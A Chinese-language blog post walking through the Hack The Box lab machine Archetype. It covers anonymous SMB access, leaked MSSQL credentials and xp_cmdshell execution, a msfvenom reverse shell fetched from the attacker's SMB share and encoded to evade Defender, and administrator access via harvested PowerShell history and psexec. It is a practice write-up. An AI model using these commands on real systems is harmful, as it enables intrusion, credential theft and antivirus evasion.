iT邦幫忙

2021 iThome 鐵人賽

DAY 21
0

是的!我買ㄌ Hack The Box 的 VIP+,因為我覺得 Try Hack Me 上面的 Windows 題目都太新手不友善了,相較之下, Hack The Box 的 Windows 題目比較多元,所以今天開始我應該都會來玩 Hack The Box 的題目! 官方說這題是 Very Easy,但我個人卻覺得有一點小難QQ。

掃 Port

  • rustscan -a 10.10.10.27 -r 1-65535
  • nmap 繼續掃
    • nmap -A -p135,139,445,5985,47001,49664,49665,49666,49667,49669,49668 10.10.10.27
      • 一堆的 RPC
      • SMB
      • 1433 是 MSSQL

SMB

  • SMB 匿名登入

    • 發現 backups
  • backups 資料夾

      • 一個 Config 載下來
  • 取得密碼資訊

    • Host Name : ARCHETYPE
    • User ID : sql_svc
    • Password : M3g4c0rp123

MSSQL

  • 安裝 impacket
    • sudo apt install python3-impacket
  • impacket-mssqlclient -p 1433 sql_svc@10.10.10.27 -windows-auth
  • MSSQL 取得 Shell 就有機會可以 RCE
    • exec xp_cmdshell '{指令}'
  • systeminfo
  • dir
    • exec xp_cmdshell 'dir'
  • 透過開啟本地 smb
    • impacket-smbserver meow .
  • 準備 Reverse shell
    • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.16 LPORT=7877 -e x86/shikata_ga_nai -f exe > shell.exe
      • 經測試,不掛 x86/shikata_ga_nai 就會被 Defender 吃掉
      • Windows 的 Reverse Shell 通常都會使用 msfvenom 來產

Shell

  • 執行 Shell
    • exec xp_cmdshell '\\10.10.16.16\meow\shell.exe'
  • 收回 Reverse shell
  • 取得 User Flag
    • 3e7b102e78218e935bf3f4951fec21a3

嘗試提權

正式提權

  • Powershell history
    • %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • Get Username and password
    • Username : administrator
    • Password : MEGACORP_4dm1n!!
  • Use psexec to get shell
    impacket-psexec administrator:'MEGACORP_4dm1n!!'@10.10.10.27
  • Get root flag
    • b91ccec3305e98240082d4474b848528

上一篇
[Day20] THM DogCat
下一篇
[Day22] HTB Blue
系列文
我想學滲透測試喵喵喵喵!!!!30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言